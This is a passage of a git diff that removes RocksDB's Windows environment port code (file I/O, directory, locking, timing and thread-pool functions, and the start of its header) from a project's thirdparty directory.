-  // the file then there is no write only mode so we have to create it
-  // Read/Write
-  // However, MapViewOfFile specifies only Write only
-  DWORD desired_access = GENERIC_WRITE;
-  DWORD shared_mode = FILE_SHARE_READ;
-
-  if (local_options.use_mmap_writes) {
-    desired_access |= GENERIC_READ;
-  }
-  else {
-    // Adding this solely for tests to pass (fault_injection_test,
-    // wal_manager_test).
-    shared_mode |= (FILE_SHARE_WRITE | FILE_SHARE_DELETE);
-  }
-
-  // This will always truncate the file
-  DWORD creation_disposition = CREATE_ALWAYS;
-  if (reopen) {
-    creation_disposition = OPEN_ALWAYS;
-  }
-
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(
-      fname.c_str(),
-      desired_access,  // Access desired
-      shared_mode,
-      NULL,           // Security attributes
-      creation_disposition,  // Posix env says (reopen) ? (O_CREATE | O_APPEND) : O_CREAT | O_TRUNC
-      fileFlags,      // Flags
-      NULL);          // Template File
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    return IOErrorFromWindowsError(
-      "Failed to create a NewWriteableFile: " + fname, lastError);
-  }
-
-  // We will start writing at the end, appending
-  if (reopen) {
-    LARGE_INTEGER zero_move;
-    zero_move.QuadPart = 0;
-    BOOL ret = SetFilePointerEx(hFile, zero_move, NULL, FILE_END);
-    if (!ret) {
-      auto lastError = GetLastError();
-      return IOErrorFromWindowsError(
-        "Failed to create a ReopenWritableFile move to the end: " + fname, lastError);
-    }
-  }
-
-  if (options.use_mmap_writes) {
-    // We usually do not use mmmapping on SSD and thus we pass memory
-    // page_size
-    result->reset(new WinMmapFile(fname, hFile, page_size_,
-      allocation_granularity_, local_options));
-  } else {
-    // Here we want the buffer allocation to be aligned by the SSD page size
-    // and to be a multiple of it
-    result->reset(new WinWritableFile(fname, hFile, page_size_,
-      c_BufferCapacity, local_options));
-  }
-  return s;
-}
-
-Status WinEnvIO::NewRandomRWFile(const std::string & fname,
-  std::unique_ptr<RandomRWFile>* result, const EnvOptions & options) {
-
-  Status s;
-
-  // Open the file for read-only random access
-  // Random access is to disable read-ahead as the system reads too much data
-  DWORD desired_access = GENERIC_READ | GENERIC_WRITE;
-  DWORD shared_mode = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE;
-  DWORD creation_disposition = OPEN_ALWAYS; // Create if necessary or open existing
-  DWORD file_flags = FILE_FLAG_RANDOM_ACCESS;
-
-  if (options.use_direct_reads && options.use_direct_writes) {
-    file_flags |= FILE_FLAG_NO_BUFFERING;
-  }
-
-  /// Shared access is necessary for corruption test to pass
-  // almost all tests would work with a possible exception of fault_injection
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile =
-      CreateFileA(fname.c_str(),
-        desired_access,
-        shared_mode,
-        NULL, // Security attributes
-        creation_disposition,
-        file_flags,
-        NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    return IOErrorFromWindowsError(
-      "NewRandomRWFile failed to Create/Open: " + fname, lastError);
-  }
-
-  UniqueCloseHandlePtr fileGuard(hFile, CloseHandleFunc);
-  result->reset(new WinRandomRWFile(fname, hFile, page_size_, options));
-  fileGuard.release();
-
-  return s;
-}
-
-Status WinEnvIO::NewDirectory(const std::string& name,
-  std::unique_ptr<Directory>* result) {
-  Status s;
-  // Must be nullptr on failure
-  result->reset();
-  // Must fail if directory does not exist
-  if (!DirExists(name)) {
-    s = IOError("Directory does not exist: " + name, EEXIST);
-  } else {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    result->reset(new WinDirectory);
-  }
-  return s;
-}
-
-Status WinEnvIO::FileExists(const std::string& fname) {
-  // F_OK == 0
-  const int F_OK_ = 0;
-  return _access(fname.c_str(), F_OK_) == 0 ? Status::OK()
-    : Status::NotFound();
-}
-
-Status WinEnvIO::GetChildren(const std::string& dir,
-  std::vector<std::string>* result) {
-
-  result->clear();
-  std::vector<std::string> output;
-
-  Status status;
-
-  auto CloseDir = [](DIR* p) { closedir(p); };
-  std::unique_ptr<DIR, decltype(CloseDir)> dirp(opendir(dir.c_str()),
-    CloseDir);
-
-  if (!dirp) {
-    switch (errno) {
-      case EACCES:
-      case ENOENT:
-      case ENOTDIR:
-        return Status::NotFound();
-      default:
-        return IOError(dir, errno);
-    }
-  } else {
-    if (result->capacity() > 0) {
-      output.reserve(result->capacity());
-    }
-
-    struct dirent* ent = readdir(dirp.get());
-    while (ent) {
-      output.push_back(ent->d_name);
-      ent = readdir(dirp.get());
-    }
-  }
-
-  output.swap(*result);
-
-  return status;
-}
-
-Status WinEnvIO::CreateDir(const std::string& name) {
-  Status result;
-
-  if (_mkdir(name.c_str()) != 0) {
-    auto code = errno;
-    result = IOError("Failed to create dir: " + name, code);
-  }
-
-  return result;
-}
-
-Status  WinEnvIO::CreateDirIfMissing(const std::string& name) {
-  Status result;
-
-  if (DirExists(name)) {
-    return result;
-  }
-
-  if (_mkdir(name.c_str()) != 0) {
-    if (errno == EEXIST) {
-      result =
-        Status::IOError("`" + name + "' exists but is not a directory");
-    } else {
-      auto code = errno;
-      result = IOError("Failed to create dir: " + name, code);
-    }
-  }
-
-  return result;
-}
-
-Status WinEnvIO::DeleteDir(const std::string& name) {
-  Status result;
-  if (_rmdir(name.c_str()) != 0) {
-    auto code = errno;
-    result = IOError("Failed to remove dir: " + name, code);
-  }
-  return result;
-}
-
-Status WinEnvIO::GetFileSize(const std::string& fname,
-  uint64_t* size) {
-  Status s;
-
-  WIN32_FILE_ATTRIBUTE_DATA attrs;
-  if (GetFileAttributesExA(fname.c_str(), GetFileExInfoStandard, &attrs)) {
-    ULARGE_INTEGER file_size;
-    file_size.HighPart = attrs.nFileSizeHigh;
-    file_size.LowPart = attrs.nFileSizeLow;
-    *size = file_size.QuadPart;
-  } else {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("Can not get size for: " + fname, lastError);
-  }
-  return s;
-}
-
-uint64_t WinEnvIO::FileTimeToUnixTime(const FILETIME& ftTime) {
-  const uint64_t c_FileTimePerSecond = 10000000U;
-  // UNIX epoch starts on 1970-01-01T00:00:00Z
-  // Windows FILETIME starts on 1601-01-01T00:00:00Z
-  // Therefore, we need to subtract the below number of seconds from
-  // the seconds that we obtain from FILETIME with an obvious loss of
-  // precision
-  const uint64_t c_SecondBeforeUnixEpoch = 11644473600U;
-
-  ULARGE_INTEGER li;
-  li.HighPart = ftTime.dwHighDateTime;
-  li.LowPart = ftTime.dwLowDateTime;
-
-  uint64_t result =
-    (li.QuadPart / c_FileTimePerSecond) - c_SecondBeforeUnixEpoch;
-  return result;
-}
-
-Status WinEnvIO::GetFileModificationTime(const std::string& fname,
-  uint64_t* file_mtime) {
-  Status s;
-
-  WIN32_FILE_ATTRIBUTE_DATA attrs;
-  if (GetFileAttributesExA(fname.c_str(), GetFileExInfoStandard, &attrs)) {
-    *file_mtime = FileTimeToUnixTime(attrs.ftLastWriteTime);
-  } else {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError(
-      "Can not get file modification time for: " + fname, lastError);
-    *file_mtime = 0;
-  }
-
-  return s;
-}
-
-Status WinEnvIO::RenameFile(const std::string& src,
-  const std::string& target) {
-  Status result;
-
-  // rename() is not capable of replacing the existing file as on Linux
-  // so use OS API directly
-  if (!MoveFileExA(src.c_str(), target.c_str(), MOVEFILE_REPLACE_EXISTING)) {
-    DWORD lastError = GetLastError();
-
-    std::string text("Failed to rename: ");
-    text.append(src).append(" to: ").append(target);
-
-    result = IOErrorFromWindowsError(text, lastError);
-  }
-
-  return result;
-}
-
-Status WinEnvIO::LinkFile(const std::string& src,
-  const std::string& target) {
-  Status result;
-
-  if (!CreateHardLinkA(target.c_str(), src.c_str(), NULL)) {
-    DWORD lastError = GetLastError();
-
-    std::string text("Failed to link: ");
-    text.append(src).append(" to: ").append(target);
-
-    result = IOErrorFromWindowsError(text, lastError);
-  }
-
-  return result;
-}
-
-Status  WinEnvIO::LockFile(const std::string& lockFname,
-  FileLock** lock) {
-  assert(lock != nullptr);
-
-  *lock = NULL;
-  Status result;
-
-  // No-sharing, this is a LOCK file
-  const DWORD ExclusiveAccessON = 0;
-
-  // Obtain exclusive access to the LOCK file
-  // Previously, instead of NORMAL attr we set DELETE on close and that worked
-  // well except with fault_injection test that insists on deleting it.
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(lockFname.c_str(), (GENERIC_READ | GENERIC_WRITE),
-      ExclusiveAccessON, NULL, CREATE_ALWAYS,
-      FILE_ATTRIBUTE_NORMAL, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    result = IOErrorFromWindowsError(
-      "Failed to create lock file: " + lockFname, lastError);
-  } else {
-    *lock = new WinFileLock(hFile);
-  }
-
-  return result;
-}
-
-Status WinEnvIO::UnlockFile(FileLock* lock) {
-  Status result;
-
-  assert(lock != nullptr);
-
-  delete lock;
-
-  return result;
-}
-
-Status WinEnvIO::GetTestDirectory(std::string* result) {
-  std::string output;
-
-  const char* env = getenv("TEST_TMPDIR");
-  if (env && env[0] != '\0') {
-    output = env;
-    CreateDir(output);
-  } else {
-    env = getenv("TMP");
-
-    if (env && env[0] != '\0') {
-      output = env;
-    } else {
-      output = "c:\\tmp";
-    }
-
-    CreateDir(output);
-  }
-
-  output.append("\\testrocksdb-");
-  output.append(std::to_string(_getpid()));
-
-  CreateDir(output);
-
-  output.swap(*result);
-
-  return Status::OK();
-}
-
-Status WinEnvIO::NewLogger(const std::string& fname,
-  std::shared_ptr<Logger>* result) {
-  Status s;
-
-  result->reset();
-
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(
-      fname.c_str(), GENERIC_WRITE,
-      FILE_SHARE_READ | FILE_SHARE_DELETE,  // In RocksDb log files are
-      // renamed and deleted before
-      // they are closed. This enables
-      // doing so.
-      NULL,
-      CREATE_ALWAYS,  // Original fopen mode is "w"
-      FILE_ATTRIBUTE_NORMAL, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("Failed to open LogFile" + fname, lastError);
-  } else {
-    {
-      // With log files we want to set the true creation time as of now
-      // because the system
-      // for some reason caches the attributes of the previous file that just
-      // been renamed from
-      // this name so auto_roll_logger_test fails
-      FILETIME ft;
-      GetSystemTimeAsFileTime(&ft);
-      // Set creation, last access and last write time to the same value
-      SetFileTime(hFile, &ft, &ft, &ft);
-    }
-    result->reset(new WinLogger(&WinEnvThreads::gettid, hosted_env_, hFile));
-  }
-  return s;
-}
-
-uint64_t WinEnvIO::NowMicros() {
-
-  if (GetSystemTimePreciseAsFileTime_ != NULL) {
-    // all std::chrono clocks on windows proved to return
-    // values that may repeat that is not good enough for some uses.
-    const int64_t c_UnixEpochStartTicks = 116444736000000000LL;
-    const int64_t c_FtToMicroSec = 10;
-
-    // This interface needs to return system time and not
-    // just any microseconds because it is often used as an argument
-    // to TimedWait() on condition variable
-    FILETIME ftSystemTime;
-    GetSystemTimePreciseAsFileTime_(&ftSystemTime);
-
-    LARGE_INTEGER li;
-    li.LowPart = ftSystemTime.dwLowDateTime;
-    li.HighPart = ftSystemTime.dwHighDateTime;
-    // Subtract unix epoch start
-    li.QuadPart -= c_UnixEpochStartTicks;
-    // Convert to microsecs
-    li.QuadPart /= c_FtToMicroSec;
-    return li.QuadPart;
-  }
-  using namespace std::chrono;
-  return duration_cast<microseconds>(system_clock::now().time_since_epoch()).count();
-}
-
-uint64_t WinEnvIO::NowNanos() {
-  // all std::chrono clocks on windows have the same resolution that is only
-  // good enough for microseconds but not nanoseconds
-  // On Windows 8 and Windows 2012 Server
-  // GetSystemTimePreciseAsFileTime(&current_time) can be used
-  LARGE_INTEGER li;
-  QueryPerformanceCounter(&li);
-  // Convert to nanoseconds first to avoid loss of precision
-  // and divide by frequency
-  li.QuadPart *= std::nano::den;
-  li.QuadPart /= perf_counter_frequency_;
-  return li.QuadPart;
-}
-
-Status WinEnvIO::GetHostName(char* name, uint64_t len) {
-  Status s;
-  DWORD nSize = static_cast<DWORD>(
-    std::min<uint64_t>(len, std::numeric_limits<DWORD>::max()));
-
-  if (!::GetComputerNameA(name, &nSize)) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("GetHostName", lastError);
-  } else {
-    name[nSize] = 0;
-  }
-
-  return s;
-}
-
-Status WinEnvIO::GetAbsolutePath(const std::string& db_path,
-  std::string* output_path) {
-  // Check if we already have an absolute path
-  // that starts with non dot and has a semicolon in it
-  if ((!db_path.empty() && (db_path[0] == '/' || db_path[0] == '\\')) ||
-    (db_path.size() > 2 && db_path[0] != '.' &&
-    ((db_path[1] == ':' && db_path[2] == '\\') ||
-    (db_path[1] == ':' && db_path[2] == '/')))) {
-    *output_path = db_path;
-    return Status::OK();
-  }
-
-  std::string result;
-  result.resize(_MAX_PATH);
-
-  char* ret = _getcwd(&result[0], _MAX_PATH);
-  if (ret == nullptr) {
-    return Status::IOError("Failed to get current working directory",
-      strerror(errno));
-  }
-
-  result.resize(strlen(result.data()));
-
-  result.swap(*output_path);
-  return Status::OK();
-}
-
-std::string WinEnvIO::TimeToString(uint64_t secondsSince1970) {
-  std::string result;
-
-  const time_t seconds = secondsSince1970;
-  const int maxsize = 64;
-
-  struct tm t;
-  errno_t ret = localtime_s(&t, &seconds);
-
-  if (ret) {
-    result = std::to_string(seconds);
-  } else {
-    result.resize(maxsize);
-    char* p = &result[0];
-
-    int len = snprintf(p, maxsize, "%04d/%02d/%02d-%02d:%02d:%02d ",
-      t.tm_year + 1900, t.tm_mon + 1, t.tm_mday, t.tm_hour,
-      t.tm_min, t.tm_sec);
-    assert(len > 0);
-
-    result.resize(len);
-  }
-
-  return result;
-}
-
-EnvOptions WinEnvIO::OptimizeForLogWrite(const EnvOptions& env_options,
-  const DBOptions& db_options) const {
-  EnvOptions optimized = env_options;
-  optimized.bytes_per_sync = db_options.wal_bytes_per_sync;
-  optimized.use_mmap_writes = false;
-  // This is because we flush only whole pages on unbuffered io and
-  // the last records are not guaranteed to be flushed.
-  optimized.use_direct_writes = false;
-  // TODO(icanadi) it's faster if fallocate_with_keep_size is false, but it
-  // breaks TransactionLogIteratorStallAtLastRecord unit test. Fix the unit
-  // test and make this false
-  optimized.fallocate_with_keep_size = true;
-  return optimized;
-}
-
-EnvOptions WinEnvIO::OptimizeForManifestWrite(
-  const EnvOptions& env_options) const {
-  EnvOptions optimized = env_options;
-  optimized.use_mmap_writes = false;
-  optimized.use_direct_writes = false;
-  optimized.fallocate_with_keep_size = true;
-  return optimized;
-}
-
-// Returns true iff the named directory exists and is a directory.
-bool WinEnvIO::DirExists(const std::string& dname) {
-  WIN32_FILE_ATTRIBUTE_DATA attrs;
-  if (GetFileAttributesExA(dname.c_str(), GetFileExInfoStandard, &attrs)) {
-    return 0 != (attrs.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY);
-  }
-  return false;
-}
-
-////////////////////////////////////////////////////////////////////////
-// WinEnvThreads
-
-WinEnvThreads::WinEnvThreads(Env* hosted_env) : hosted_env_(hosted_env), thread_pools_(Env::Priority::TOTAL) {
-
-  for (int pool_id = 0; pool_id < Env::Priority::TOTAL; ++pool_id) {
-    thread_pools_[pool_id].SetThreadPriority(
-      static_cast<Env::Priority>(pool_id));
-    // This allows later initializing the thread-local-env of each thread.
-    thread_pools_[pool_id].SetHostEnv(hosted_env);
-  }
-}
-
-WinEnvThreads::~WinEnvThreads() {
-
-  WaitForJoin();
-
-  for (auto& thpool : thread_pools_) {
-    thpool.JoinAllThreads();
-  }
-}
-
-void WinEnvThreads::Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-  void* tag, void(*unschedFunction)(void* arg)) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  thread_pools_[pri].Schedule(function, arg, tag, unschedFunction);
-}
-
-int WinEnvThreads::UnSchedule(void* arg, Env::Priority pri) {
-  return thread_pools_[pri].UnSchedule(arg);
-}
-
-namespace {
-
-  struct StartThreadState {
-    void(*user_function)(void*);
-    void* arg;
-  };
-
-  void* StartThreadWrapper(void* arg) {
-    std::unique_ptr<StartThreadState> state(
-      reinterpret_cast<StartThreadState*>(arg));
-    state->user_function(state->arg);
-    return nullptr;
-  }
-
-}
-
-void WinEnvThreads::StartThread(void(*function)(void* arg), void* arg) {
-  std::unique_ptr<StartThreadState> state(new StartThreadState);
-  state->user_function = function;
-  state->arg = arg;
-  try {
-
-    rocksdb::port::WindowsThread th(&StartThreadWrapper, state.get());
-    state.release();
-
-    std::lock_guard<std::mutex> lg(mu_);
-    threads_to_join_.push_back(std::move(th));
-
-  } catch (const std::system_error& ex) {
-    WinthreadCall("start thread", ex.code());
-  }
-}
-
-void WinEnvThreads::WaitForJoin() {
-  for (auto& th : threads_to_join_) {
-    th.join();
-  }
-  threads_to_join_.clear();
-}
-
-unsigned int WinEnvThreads::GetThreadPoolQueueLen(Env::Priority pri) const {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  return thread_pools_[pri].GetQueueLen();
-}
-
-uint64_t WinEnvThreads::gettid() {
-  uint64_t thread_id = GetCurrentThreadId();
-  return thread_id;
-}
-
-uint64_t WinEnvThreads::GetThreadID() const { return gettid(); }
-
-void  WinEnvThreads::SleepForMicroseconds(int micros) {
-  std::this_thread::sleep_for(std::chrono::microseconds(micros));
-}
-
-void WinEnvThreads::SetBackgroundThreads(int num, Env::Priority pri) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  thread_pools_[pri].SetBackgroundThreads(num);
-}
-
-int WinEnvThreads::GetBackgroundThreads(Env::Priority pri) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  return thread_pools_[pri].GetBackgroundThreads();
-}
-
-void WinEnvThreads::IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) {
-  assert(pri >= Env::Priority::BOTTOM && pri <= Env::Priority::HIGH);
-  thread_pools_[pri].IncBackgroundThreadsIfNeeded(num);
-}
-
-/////////////////////////////////////////////////////////////////////////
-// WinEnv
-
-WinEnv::WinEnv() : winenv_io_(this), winenv_threads_(this) {
-  // Protected member of the base class
-  thread_status_updater_ = CreateThreadStatusUpdater();
-}
-
-
-WinEnv::~WinEnv() {
-  // All threads must be joined before the deletion of
-  // thread_status_updater_.
-  delete thread_status_updater_;
-}
-
-Status WinEnv::GetThreadList(
-  std::vector<ThreadStatus>* thread_list) {
-  assert(thread_status_updater_);
-  return thread_status_updater_->GetThreadList(thread_list);
-}
-
-Status WinEnv::DeleteFile(const std::string& fname) {
-  return winenv_io_.DeleteFile(fname);
-}
-
-Status WinEnv::GetCurrentTime(int64_t* unix_time) {
-  return winenv_io_.GetCurrentTime(unix_time);
-}
-
-Status  WinEnv::NewSequentialFile(const std::string& fname,
-  std::unique_ptr<SequentialFile>* result,
-  const EnvOptions& options) {
-  return winenv_io_.NewSequentialFile(fname, result, options);
-}
-
-Status WinEnv::NewRandomAccessFile(const std::string& fname,
-  std::unique_ptr<RandomAccessFile>* result,
-  const EnvOptions& options) {
-  return winenv_io_.NewRandomAccessFile(fname, result, options);
-}
-
-Status WinEnv::NewWritableFile(const std::string& fname,
-                               std::unique_ptr<WritableFile>* result,
-                               const EnvOptions& options) {
-  return winenv_io_.OpenWritableFile(fname, result, options, false);
-}
-
-Status WinEnv::ReopenWritableFile(const std::string& fname,
-    std::unique_ptr<WritableFile>* result, const EnvOptions& options) {
-  return winenv_io_.OpenWritableFile(fname, result, options, true);
-}
-
-Status WinEnv::NewRandomRWFile(const std::string & fname,
-  unique_ptr<RandomRWFile>* result, const EnvOptions & options) {
-  return winenv_io_.NewRandomRWFile(fname, result, options);
-}
-
-Status WinEnv::NewDirectory(const std::string& name,
-  std::unique_ptr<Directory>* result) {
-  return winenv_io_.NewDirectory(name, result);
-}
-
-Status WinEnv::FileExists(const std::string& fname) {
-  return winenv_io_.FileExists(fname);
-}
-
-Status WinEnv::GetChildren(const std::string& dir,
-  std::vector<std::string>* result) {
-  return winenv_io_.GetChildren(dir, result);
-}
-
-Status WinEnv::CreateDir(const std::string& name) {
-  return winenv_io_.CreateDir(name);
-}
-
-Status WinEnv::CreateDirIfMissing(const std::string& name) {
-  return winenv_io_.CreateDirIfMissing(name);
-}
-
-Status WinEnv::DeleteDir(const std::string& name) {
-  return winenv_io_.DeleteDir(name);
-}
-
-Status WinEnv::GetFileSize(const std::string& fname,
-  uint64_t* size) {
-  return winenv_io_.GetFileSize(fname, size);
-}
-
-Status  WinEnv::GetFileModificationTime(const std::string& fname,
-  uint64_t* file_mtime) {
-  return winenv_io_.GetFileModificationTime(fname, file_mtime);
-}
-
-Status WinEnv::RenameFile(const std::string& src,
-  const std::string& target) {
-  return winenv_io_.RenameFile(src, target);
-}
-
-Status WinEnv::LinkFile(const std::string& src,
-  const std::string& target) {
-  return winenv_io_.LinkFile(src, target);
-}
-
-Status WinEnv::LockFile(const std::string& lockFname,
-  FileLock** lock) {
-  return winenv_io_.LockFile(lockFname, lock);
-}
-
-Status WinEnv::UnlockFile(FileLock* lock) {
-  return winenv_io_.UnlockFile(lock);
-}
-
-Status  WinEnv::GetTestDirectory(std::string* result) {
-  return winenv_io_.GetTestDirectory(result);
-}
-
-Status WinEnv::NewLogger(const std::string& fname,
-  std::shared_ptr<Logger>* result) {
-  return winenv_io_.NewLogger(fname, result);
-}
-
-uint64_t WinEnv::NowMicros() {
-  return winenv_io_.NowMicros();
-}
-
-uint64_t  WinEnv::NowNanos() {
-  return winenv_io_.NowNanos();
-}
-
-Status WinEnv::GetHostName(char* name, uint64_t len) {
-  return winenv_io_.GetHostName(name, len);
-}
-
-Status WinEnv::GetAbsolutePath(const std::string& db_path,
-  std::string* output_path) {
-  return winenv_io_.GetAbsolutePath(db_path, output_path);
-}
-
-std::string WinEnv::TimeToString(uint64_t secondsSince1970) {
-  return winenv_io_.TimeToString(secondsSince1970);
-}
-
-void  WinEnv::Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-  void* tag,
-  void(*unschedFunction)(void* arg)) {
-  return winenv_threads_.Schedule(function, arg, pri, tag, unschedFunction);
-}
-
-int WinEnv::UnSchedule(void* arg, Env::Priority pri) {
-  return winenv_threads_.UnSchedule(arg, pri);
-}
-
-void WinEnv::StartThread(void(*function)(void* arg), void* arg) {
-  return winenv_threads_.StartThread(function, arg);
-}
-
-void WinEnv::WaitForJoin() {
-  return winenv_threads_.WaitForJoin();
-}
-
-unsigned int  WinEnv::GetThreadPoolQueueLen(Env::Priority pri) const {
-  return winenv_threads_.GetThreadPoolQueueLen(pri);
-}
-
-uint64_t WinEnv::GetThreadID() const {
-  return winenv_threads_.GetThreadID();
-}
-
-void WinEnv::SleepForMicroseconds(int micros) {
-  return winenv_threads_.SleepForMicroseconds(micros);
-}
-
-// Allow increasing the number of worker threads.
-void  WinEnv::SetBackgroundThreads(int num, Env::Priority pri) {
-  return winenv_threads_.SetBackgroundThreads(num, pri);
-}
-
-int WinEnv::GetBackgroundThreads(Env::Priority pri) {
-  return winenv_threads_.GetBackgroundThreads(pri);
-}
-
-void  WinEnv::IncBackgroundThreadsIfNeeded(int num, Env::Priority pri) {
-  return winenv_threads_.IncBackgroundThreadsIfNeeded(num, pri);
-}
-
-EnvOptions WinEnv::OptimizeForLogWrite(const EnvOptions& env_options,
-  const DBOptions& db_options) const {
-  return winenv_io_.OptimizeForLogWrite(env_options, db_options);
-}
-
-EnvOptions WinEnv::OptimizeForManifestWrite(
-  const EnvOptions& env_options) const {
-  return winenv_io_.OptimizeForManifestWrite(env_options);
-}
-
-}  // namespace port
-
-std::string Env::GenerateUniqueId() {
-  std::string result;
-
-  UUID uuid;
-  UuidCreateSequential(&uuid);
-
-  RPC_CSTR rpc_str;
-  auto status = UuidToStringA(&uuid, &rpc_str);
-  (void)status;
-  assert(status == RPC_S_OK);
-
-  result = reinterpret_cast<char*>(rpc_str);
-
-  status = RpcStringFreeA(&rpc_str);
-  assert(status == RPC_S_OK);
-
-  return result;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/env_win.h b/thirdparty/rocksdb/port/win/env_win.h
deleted file mode 100644
index ce1a61d..0000000
--- a/thirdparty/rocksdb/port/win/env_win.h
+++ /dev/null
@@ -1,310 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An Env is an interface used by the rocksdb implementation to access
-// operating system functionality like the filesystem etc.  Callers
-// may wish to provide a custom Env object when opening a database to
-// get fine gain control; e.g., to rate limit file system operations.
-//
-// All Env implementations are safe for concurrent access from
-// multiple threads without any external synchronization.
-
-#pragma once
-
-#include "port/win/win_thread.h"
-#include <rocksdb/env.h>
-#include "util/threadpool_imp.h"
-
-#include <stdint.h>
-#include <windows.h>
-
-#include <mutex>
-#include <vector>
-#include <string>
-
-
-#undef GetCurrentTime
-#undef DeleteFile
-#undef GetTickCount
-
-namespace rocksdb {
-namespace port {
-
-// Currently not designed for inheritance but rather a replacement
-class WinEnvThreads {
-public:
-
-  explicit WinEnvThreads(Env* hosted_env);
-
-  ~WinEnvThreads();
-
-  WinEnvThreads(const WinEnvThreads&) = delete;
-  WinEnvThreads& operator=(const WinEnvThreads&) = delete;
-
-  void Schedule(void(*function)(void*), void* arg, Env::Priority pri,
-    void* tag,
-    void(*unschedFunction)(void* arg));
-
-  int UnSchedule(void* arg, Env::Priority pri);
-
-  void StartThread(void(*function)(void* arg), void* arg);
-
-  void WaitForJoin();
-
-  unsigned int GetThreadPoolQueueLen(Env::Priority pri) const;
-
-  static uint64_t gettid();
-
-  uint64_t GetThreadID() const;
-
-  void SleepForMicroseconds(int micros);
-
-  // Allow increasing the number of worker threads.
-  void SetBackgroundThreads(int num, Env::Priority pri);
-  int GetBackgroundThreads(Env::Priority pri);
-
-  void IncBackgroundThreadsIfNeeded(int num, Env::Priority pri);
-
-private:
-
-  Env*                     hosted_env_;
-  mutable std::mutex       mu_;
-  std::vector<ThreadPoolImpl> thread_pools_;
-  std::vector<WindowsThread> threads_to_join_;
-
-};
-
-// Designed for inheritance so can be re-used
-// but certain parts replaced
-class WinEnvIO {
-public:
-  explicit WinEnvIO(Env* hosted_env);
-
-  virtual ~WinEnvIO();
-
-  virtual Status DeleteFile(const std::string& fname);
-
-  virtual Status GetCurrentTime(int64_t* unix_time);
-
-  virtual Status NewSequentialFile(const std::string& fname,
-    std::unique_ptr<SequentialFile>* result,
-    const EnvOptions& options);
-
-  // Helper for NewWritable and ReopenWritableFile
-  virtual Status OpenWritableFile(const std::string& fname,
-    std::unique_ptr<WritableFile>* result,
-    const EnvOptions& options,
-    bool reopen);
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-    std::unique_ptr<RandomAccessFile>* result,
-    const EnvOptions& options);
-
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewRandomRWFile(const std::string& fname,
-    unique_ptr<RandomRWFile>* result,
-    const EnvOptions& options);
-
-  virtual Status NewDirectory(const std::string& name,
-    std::unique_ptr<Directory>* result);
-
-  virtual Status FileExists(const std::string& fname);
-
-  virtual Status GetChildren(const std::string& dir,
-    std::vector<std::string>* result);
-
-  virtual Status CreateDir(const std::string& name);
-
-  virtual Status CreateDirIfMissing(const std::string& name);
-
-  virtual Status DeleteDir(const std::string& name);
-
-  virtual Status GetFileSize(const std::string& fname,
-    uint64_t* size);
-
-  static uint64_t FileTimeToUnixTime(const FILETIME& ftTime);
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-    uint64_t* file_mtime);
-
-  virtual Status RenameFile(const std::string& src,
-    const std::string& target);
-
-  virtual Status LinkFile(const std::string& src,
-    const std::string& target);
-
-  virtual Status LockFile(const std::string& lockFname,
-    FileLock** lock);
-
-  virtual Status UnlockFile(FileLock* lock);
-
-  virtual Status GetTestDirectory(std::string* result);
-
-  virtual Status NewLogger(const std::string& fname,
-    std::shared_ptr<Logger>* result);
-
-  virtual uint64_t NowMicros();
-
-  virtual uint64_t NowNanos();
-
-  virtual Status GetHostName(char* name, uint64_t len);
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-    std::string* output_path);
-
-  virtual std::string TimeToString(uint64_t secondsSince1970);
-
-  virtual EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-    const DBOptions& db_options) const;
-
-  virtual EnvOptions OptimizeForManifestWrite(
-    const EnvOptions& env_options) const;
-
-  size_t GetPageSize() const { return page_size_; }
-
-  size_t GetAllocationGranularity() const { return allocation_granularity_; }
-
-  uint64_t GetPerfCounterFrequency() const { return perf_counter_frequency_; }
-
-private:
-  // Returns true iff the named directory exists and is a directory.
-  virtual bool DirExists(const std::string& dname);
-
-  typedef VOID(WINAPI * FnGetSystemTimePreciseAsFileTime)(LPFILETIME);
-
-  Env*            hosted_env_;
-  size_t          page_size_;
-  size_t          allocation_granularity_;
-  uint64_t        perf_counter_frequency_;
-  FnGetSystemTimePreciseAsFileTime GetSystemTimePreciseAsFileTime_;
-};
-
-class WinEnv : public Env {
-public:
-  WinEnv();
-
-  ~WinEnv();
-
-  Status DeleteFile(const std::string& fname) override;
-
-  Status GetCurrentTime(int64_t* unix_time) override;
-
